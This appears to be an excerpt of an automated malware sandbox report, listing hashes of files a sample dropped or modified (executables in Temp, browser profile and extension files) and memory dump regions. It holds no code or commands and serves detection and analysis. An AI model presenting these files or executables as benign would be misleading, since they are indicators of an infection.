| SHA1 | 2d0eaed6f9fc9629b53fb2a9c8026411d1017f20 |
| SHA256 | 9b340ec9cc90f634323bf17dd7cd637c4fcfa0ef8e99f075f7ff5bc16e23df1d |
| SHA512 | 79a7c4decbc50fbbf5c3e8912a2c777680782f9677faea37284ea27e83de7394cc5da6f3c0b080582bf50266f56e0ec253be65c573cee196993b9256213a33c7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Rx
| MD5 | 767e21ea885038dfac63e7bc24afd41f |
| SHA1 | a5cf1fd7e07ea0cf708c056de5a6d1d3de65b33f |
| SHA256 | 762f98176ddd5df08f486c08d3e96748f7c26d3696112a6e0f9cdbbe16d39a27 |
| SHA512 | 5ea5f9a04b29fadf77a4b71b98b77ddec498b835f95fe604c2ff9d21c15eda29d8ddc47f38a52354bb15e45a5a4dbfd649b8e3dd23adb24bb05cdaf04aa9b675 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Sewing
| MD5 | ddd91dbbc6516ec6e2dc2d805ff2f4b8 |
| SHA1 | 75e30f11e0f113cde5b5fe1fdb934c24266fee65 |
| SHA256 | 9355ca9dc85697d9fcbdf8ad8bc683f53d655833a137149c58e88b88d483ed7f |
| SHA512 | 69376d03121516847d789a6091740d8ab2d12d211f8757da51ef7307a6c85bf9e8646dc1f377c7730da2f9da16624084619ff9b299453216f5c06960ec7dbffc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Df
| MD5 | 5548048d3fa30e720d28e32e6de2b170 |
| SHA1 | 95540bc39b7ae528171f2a2ed87c2cd49d1a8204 |
| SHA256 | 0e75a4b5a51937f067d113268427c21d25e6ae43f62ccdded6df11e414e55279 |
| SHA512 | a41670977776e68205f2cb29a3aaf8714d6e8775bc9b77ee049d0b9b82c2ef439cab0f1d42dee131b00347ada1b8cc044075f58f050549b4b69d223a9dc2c4bc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Basic
| MD5 | d9be996166f9ef2572c6719e3ebf721e |
| SHA1 | bd889e733d046ddfebe63bb7420c8c75311c0c61 |
| SHA256 | d345c73a3e73677254467bf11c977656adf50eb12af2c1066be971d028417105 |
| SHA512 | 405adef1992f11bd9f28609ad8012f38b6bc2c3bbc855b63bc3fd016966c52ec44f4c52ec2746ac72c376a05b056ae3a8a6986448551c3b6ce1def7c8b6ab5b5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Produces
| MD5 | 38e856b6d414dc140ee435123acb217c |
| SHA1 | 131c4e370619e746cca8105e98eaa9b4cc13d99c |
| SHA256 | 44af9e2d096e009266250f0c1cf1f7a78278ab6510b41790fa30fb736b4ed4b0 |
| SHA512 | 606ef10405c8a9389af6727ced5e65413fc0554c40c5f1b65dbc86215e9b73c340478d3aa1c850fac7c7cf3411b1bfc4cd0e9f00216c63b4f50a62f2014dc000 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Toolbox
| MD5 | 357586b3b2b2885f95c38e5613084b4e |
| SHA1 | 93b1ab258d2df7e908353de64ab532e838671576 |
| SHA256 | a6d6c3e9294671e3f12b903a8960f096d136ae070ec372be1167def242b64f76 |
| SHA512 | 6e0368f4f7de5d98eb5ee6b199abb830d0facb29d65422bdda55513efc1c22a2a3ca9b5fce5b4d30d7e5ece6c28bbbc598f30145c132f45f86e1b88024defdfe |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Accredited
| MD5 | acca19dc2ccc50994258a816e8c31439 |
| SHA1 | 40ccf9dab204569cef118dd200d3fe90f21b3a63 |
| SHA256 | e289f94b916861fd796ec001f718bc9502103747738d524827d76aba188b5242 |
| SHA512 | c00e1b9dc0adf7539bbb3a86462492f77865fc82f29a2f1cff472fc2a7684c8b73e76cadf6f048423928d00a3555120a487d3600b57ccdf3ef8618a787ae27c7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Work
| MD5 | d2322148fea16b4e59c4aff5045edb94 |
| SHA1 | 9bb259c9f7d4c8b74bda37d929017cbc462ced56 |
| SHA256 | 7bf57ae312b7272763d9471bec53974343c4c7e3c8cc4b3a091f974aae4b92f5 |
| SHA512 | 187e96bb93b385c3379875eafbef649ae091f1f49e638df93ad3dc819d3df5bb7254a95a07baf8bf1780b360cdd159f05d26b22c7ab0512c2257116539a42dc3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Cloudy
| MD5 | b4e67ae79616fc04555a08b1ac219437 |
| SHA1 | fb062a5769860e80c896b9d2990a517f98cb6e9a |
| SHA256 | 13d3dfb8de15ae95bf3747318a6f14a0b229e6f9f71f43ba72bcf7e16ceb695b |
| SHA512 | 5cc9606c488055374f70b9822df01277ac39640ddacd52c465ee18b58e7223bd99900bcef3dbf02280ac5d664631e86bcde0591e7aef99498f456bfebd6ffae1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Command
| MD5 | 9fde6ca656f07f93012fe2ada84df07f |
| SHA1 | c8d590380f9276ab86e87d80857767def4cb8625 |
| SHA256 | 8350dbaafb0768c1858a20e55312f574d764a77a0d81b8d883a3422c161b2351 |
| SHA512 | 16d43ca44e18c62ed044797568332d57c58489cb729bea528b0c5d5035699ec8b2f5bcc20fcfeb68a273b28c90979353d4d2c7625d8ccf43eceb149cb0abb585 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Botswana
| MD5 | 72daa9860999eb0c7ab8729e5b7e1222 |
| SHA1 | 23680f2c8a9341aa62e1d22c905f8404da7a06ea |
| SHA256 | 9ab45d6a0a920e937fef6e53ffba2c66c9e66ec7bf858d907091b95e7a6bfb2d |
| SHA512 | e5e92aa59e18b85f035b450613177332b56d4d1b37b1d5246558dd2ead8e80deede634756ce6cad7d2e3b35a2713438209bf489a45886cee4b898af9fd619c55 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Dead
| MD5 | be07dcfc960044abce2d820437d591f9 |
| SHA1 | 74df641fb391081a146d04870915d9b1e047d702 |
| SHA256 | e5cf5503dc9628aa16fdabf138f08c746cbd784c9251c8929697ae693505b6a6 |
| SHA512 | 0ab2898c9690d943ce2685e7890655bde5f863f1ceda73a88acb6c7e8638569250ba7770ce97302e49a82c7c8dd000795ebc5a28659f45694ffbd063e8d8b262 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Proof
| MD5 | 746467a1740cf42ba997fb7867b25ab4 |
| SHA1 | b4a2cf85feafb9b4ca708e32e01e1b735d643d51 |
| SHA256 | e56fdff5624c275579811218738a4c6c1f8c452fa580724e40272d6ad807ee12 |
| SHA512 | 95515327b72358c47c616b5515fd8e06072a338c7c82291a6c44178db3c79ddb3e99763f213f8e141bd2193758df715dd547fcc432a3e7e8f162e876016d64cb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Rejected
| MD5 | 66471c06ca153f3c73d898ccbd6ddfa4 |
| SHA1 | edd5909e1dbe51bf3e9c5642e8f01f22cc5aeb37 |
| SHA256 | e8c72ba4ac80dfbea78c7766f5a524c8d8dab14539a48f6b994d49a17631b76e |
| SHA512 | eda8eed735abb8583b9c80a08e1be315026d2c30ea8087ee5cf69be4c3b761387ef1d7d9a174282651bc4c9ccfad48720c2c0b586cd695350a1d173f6886c529 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Fin
| MD5 | 6a433bc039405ef66b941cf80229c28f |
| SHA1 | 6ddf3d88d22e877c410862f900de7ce9740ef408 |
| SHA256 | b6ac6eecca6d648b1419a2d6eb30e68a4051061647520e0068efc82157cc8758 |
| SHA512 | 2b92c9e18607a6aab86c846fca6c8223db5b8eb9f5908300f03621af8739b9ad1ed56ceb8aa18d57f3604dc2841c721a6ff0d2c7bd25bdb1e682424339b662c6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Quizzes
| MD5 | 4561d9b0260c6b42c11b93a233692f76 |
| SHA1 | fb99d527c09ba27f90973779c0a990d02e38cbfd |
| SHA256 | 58caad9d458486a77a943df42c2f55a7412f3d471b1c5cffe19b929562a98a43 |
| SHA512 | a996ad2e7f60f0b0839669e5c0a9bb19f90b01ceb1cf4f655f47f778eb17c254e2fcb2345bfaa28b2abc2092152f3817767ac37c8557d79355d2effd5b3e4d94 |
memory/4028-1039-0x0000000000D70000-0x0000000001243000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
| MD5 | c09ff1273b09cb1f9c7698ed147bf22e |
| SHA1 | 5634aec5671c4fd565694aa12cd3bf11758675d2 |
| SHA256 | bf8ce6bb537881386facfe6c1f9003812b985cbc4b9e9addd39e102449868d92 |
| SHA512 | e8f19b432dc3be9a6138d6a2f79521599087466d1c55a49d73600c876508ab307a6e65694e0effb5b705fdecdd0e201f588c8d5c3767fe9ae0b8581c318cadac |
memory/2152-1152-0x0000000006210000-0x00000000062AC000-memory.dmp
memory/636-1194-0x0000021248990000-0x00000212489B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcvwvkaa.lo2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1152-1200-0x00000000007E0000-0x0000000000C88000-memory.dmp
memory/3912-1212-0x0000000002D80000-0x0000000002DB6000-memory.dmp
memory/3912-1213-0x0000000005930000-0x0000000005F5A000-memory.dmp
memory/3912-1214-0x00000000058F0000-0x0000000005912000-memory.dmp
memory/3912-1215-0x0000000005FD0000-0x0000000006036000-memory.dmp
memory/3912-1224-0x0000000006180000-0x00000000064D7000-memory.dmp
memory/3912-1225-0x0000000006580000-0x000000000659E000-memory.dmp
memory/3912-1226-0x00000000065C0000-0x000000000660C000-memory.dmp
memory/4028-1227-0x0000000000D70000-0x0000000001243000-memory.dmp
memory/916-1228-0x0000000000330000-0x0000000000927000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe
| MD5 | 66a5a529386533e25316942993772042 |
| SHA1 | 053d0d7f4cb6e3952e849f02bbfbdb4d39021146 |
| SHA256 | 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94 |
| SHA512 | 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a |
memory/3912-1257-0x0000000006A60000-0x0000000006A7A000-memory.dmp
memory/3912-1256-0x00000000077F0000-0x0000000007886000-memory.dmp
memory/3912-1258-0x0000000006AF0000-0x0000000006B12000-memory.dmp
memory/2420-1261-0x0000000005ED0000-0x0000000006227000-memory.dmp
memory/2420-1270-0x0000000006990000-0x00000000069DC000-memory.dmp
memory/2420-1271-0x0000000007D00000-0x000000000837A000-memory.dmp
memory/5072-1272-0x0000000010000000-0x00000000105CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
| MD5 | e817cc929fbc651c5bdab9e8cca0d9d9 |
| SHA1 | 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f |
| SHA256 | 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282 |
| SHA512 | a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f |
memory/3376-1292-0x0000000000630000-0x0000000000870000-memory.dmp
memory/3376-1293-0x00000000052C0000-0x00000000054DC000-memory.dmp
memory/3376-1294-0x0000000006610000-0x000000000682E000-memory.dmp
memory/3376-1304-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1320-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1322-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1318-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1316-0x0000000006610000-0x0000000006828000-memory.dmp
memory/2152-1458-0x00000000061E0000-0x00000000061EC000-memory.dmp
memory/3376-1314-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1309-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1310-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1306-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1324-0x0000000006610000-0x0000000006828000-memory.dmp
memory/3376-1303-0x0000000006610000-0x0000000006828000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0c705388d79c00418e5c1751159353e3 |
| SHA1 | aaeafebce5483626ef82813d286511c1f353f861 |
| SHA256 | 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d |
| SHA512 | c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f |
memory/3376-6215-0x0000000006AE0000-0x0000000006B2C000-memory.dmp
memory/3376-6214-0x0000000006A80000-0x0000000006AD8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0d84d1490aa9f725b68407eab8f0030e |
| SHA1 | 83964574467b7422e160af34ef024d1821d6d1c3 |
| SHA256 | 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e |
| SHA512 | f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 940f5df4cd8d5a214198767c3bd2bad6 |
| SHA1 | de5888804357ae033ef75cee371c445e48a158d1 |
| SHA256 | 20ff572b91587f802e6190277673d25a9ebe52a584c09cf0a07f0bba4bfc4edf |
| SHA512 | 1c3bbf87907a6f9eedbd1d729e858c75c714e2c7e69ca8a0f1c897ef1e48916239f6ab6f86018808201fc145b2c4a3040f58773b75bae25ae71eef3ad9aee483 |
memory/3760-6283-0x0000000005140000-0x0000000005497000-memory.dmp
memory/3760-6291-0x00000000055E0000-0x000000000562C000-memory.dmp
memory/5708-6292-0x0000000000D70000-0x0000000001243000-memory.dmp
memory/5372-6295-0x00000000007E0000-0x0000000000C88000-memory.dmp
memory/5708-6297-0x0000000000D70000-0x0000000001243000-memory.dmp
memory/5372-6299-0x00000000007E0000-0x0000000000C88000-memory.dmp
memory/3340-6321-0x0000000005C70000-0x0000000005CBC000-memory.dmp
memory/3340-6323-0x0000000006050000-0x0000000006096000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fcc6ff235c86baedaacfdf8bef00d821 |
| SHA1 | f7665d242af03125e86b90a0d97d4e377aafceeb |
| SHA256 | 2d207e6eba5f4dd3354c70fc9336b6ecf149551c5aa1823367e6c36090e80f6f |
| SHA512 | 67d75ec1eee6c8920fcbd0af40b304306b6979bfe780bba0d9a4885ac08b14cac57f36353fe72d720e8646224edc18753e72a2f39377398d758038b000f4543c |
memory/3340-6340-0x0000000006FA0000-0x0000000006FB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1b7230d7f9cfab5f263434e0afeae3fa |
| SHA1 | 90e80511427d50def6811a8c499858b62e7a0390 |
| SHA256 | 225248ef362f91d0c7e86327335e3216d13b683b963a421f8d2eb83f5dde3a7a |
| SHA512 | 4d600dc5eb5d49cecf1cb2d12d6df6d1984303f63af5089433e6527a8a6fc6b0bdf441a45517c5442de733078254bd6363290a50bb722c373ee8b2cdc8007072 |
memory/3340-6350-0x0000000007320000-0x0000000007336000-memory.dmp
memory/5936-6361-0x0000000006D50000-0x0000000006D84000-memory.dmp
memory/5936-6362-0x000000006F4E0000-0x000000006F52C000-memory.dmp
memory/5936-6371-0x0000000006D90000-0x0000000006DAE000-memory.dmp
memory/5936-6372-0x0000000006DC0000-0x0000000006E64000-memory.dmp
memory/5936-6377-0x0000000007060000-0x000000000706A000-memory.dmp
memory/5936-6380-0x0000000007200000-0x0000000007211000-memory.dmp
memory/5196-6390-0x000000006F4E0000-0x000000006F52C000-memory.dmp
memory/5196-6400-0x0000000007A40000-0x0000000007A51000-memory.dmp
memory/3340-6411-0x0000000002290000-0x00000000022A6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a724fc861874ee09962885e5979ae51b |
| SHA1 | 962513b9afc97ae42ce0655a84bde2424b77bc98 |
| SHA256 | 26de69f343630056b79798533c767ef54ea2babfa6802028fb138454304cb17b |
| SHA512 | 79c27f8b758e6139128fd4392b786591ee8ba238081ac24650af93ec7e432e69dc6236648da6e8cb732733f5b905577c3c822eea4620d41a74cd9775e0678c9f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 67df09705539dab3035f43ce273e3296 |
| SHA1 | 90a887f9cb1fa9c539a1c10a7f7dfcc11e66f220 |
| SHA256 | 8cfa57599b4a76375d381932ea8a7028ec30494ae1563a9ecc337ff9b66679de |
| SHA512 | 39d9e8d626ea612a87d8e73051d5b7e6ade5162d72fb24f12c4a6bca192b4746ec8a4d71f6b33696ba6b4824aa0da37fc6a2acaf1c187a9c4a7a3b3392693573 |
memory/3376-6473-0x0000000006C80000-0x0000000006CD4000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 619bfdec43a0c21c19330d0aa9da6141 |
| SHA1 | ff1a8a0f4aa32a0bbe4b4a4c09e380640bca17b6 |
| SHA256 | 79ee19deee41f4c68a6f0fb08ad2b58a0e32b63f1477b00446ce763199ec955f |
| SHA512 | f19dec74652eb7888533705d576ebb19d9289a78ec07b3bcec2cdf9e9e11a230e615bf8ca7a93425da5358929f1ed3e544f3e04be87f55811110cc5289133c42 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\prefs.js
| MD5 | 6c4dd33bdf211d077703ab13651bf7c7 |
| SHA1 | 1075416e0c414265812279c5743e7b19e94c0e21 |
| SHA256 | f5b8f752eb9b01a589db7382f356c6aad0aecacd1ce79fcc2ec4fb138baeb7b8 |
| SHA512 | b4dbfdd81e6be057e9aa1da1e826f42158003ac4064bd84c898fbc8397346606e9725a348fd3c33d45fe8dab131304e8f8fc4001722f7d4076ed0de98eab1526 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | d4a912e0ee242f7cee43f1208a3c8c6d |
| SHA1 | 4dd9e54549e2e74dfa14f56f060a08c4bee23bbc |
| SHA256 | a26e1fd8781182a6f97ce372c3c7402257f9af8217b111d056777bfdf4f8fe14 |
| SHA512 | 5db4726422268955538afb303d19568cbefa918018c2c7c0bfe2e29c27a43b127fef4c28df095aada1a9256fe197f4169235eb25d1655fc7fb26a90dadef3a92 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4709a3d8f14b13241fa0d959fbc80876 |
| SHA1 | 490056b573e2d6092f462a3f8cb3fcb84f154301 |
| SHA256 | 2a672d856295702ae21958009f1edc5d0ba85b61a002f1475e0d11c4655f4561 |
| SHA512 | 11b2cff61d0d49aa2cd782d0260f4e2331764c393a624cff95150661c3ff9fb0ad2ff7bcab93e031e21c56b8eabfbb9cb4b5fcab07b440cab339120fc51998f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | bfefed9bff280f46e0ed9c6d30c449ae |
| SHA1 | d1473fce0a62189e7f0920ff4e271135f24087e2 |
| SHA256 | ff58209d301701501415e1fe45b3f57125b2bd875386c99ef0b5b06d238cebba |
| SHA512 | c532fcb860556dc75044623cb18d61c3f7653b71ac72b91c17aef8cacc144e959d25254dbd32aa7e2f840198353fd212305f24a6e987cc225e1f6a807dba1a9e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6bf56baf0280c62c2f8948d576a14c5c |
| SHA1 | 5cd061f2b1e542a275fe7a58f20bce9864cee3fb |
| SHA256 | eb64e14293241f646e0a41a3e629064b2b2721c2b19b169fa0ac12fe601317ab |
| SHA512 | 3bb41e8f1bd97c9ce982e9ee73cfd4c97e47ca9c4ed9c2bd8540bf69e53f6c52fcfc3f37ea15727004f37c6c4969c57435b80042d0f9e7fa4b589dd41191ef58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | ab826a905d77d3e23a545d55464e004d |
| SHA1 | 70956ccec33f7c9ac2cb0955dc00c428c4c031fc |
| SHA256 | 787345f3c951d0e276098d69327a88b13f59cef132497878021d3ebd285fe741 |
| SHA512 | 17b9b109b47289b0b0861f585091f65271a4af4b211e5833f61c11f8bdec5027579f86fd61ffe249381d53b4aa53f20f72b78c4154664c2b02fc0f6159ed7cae |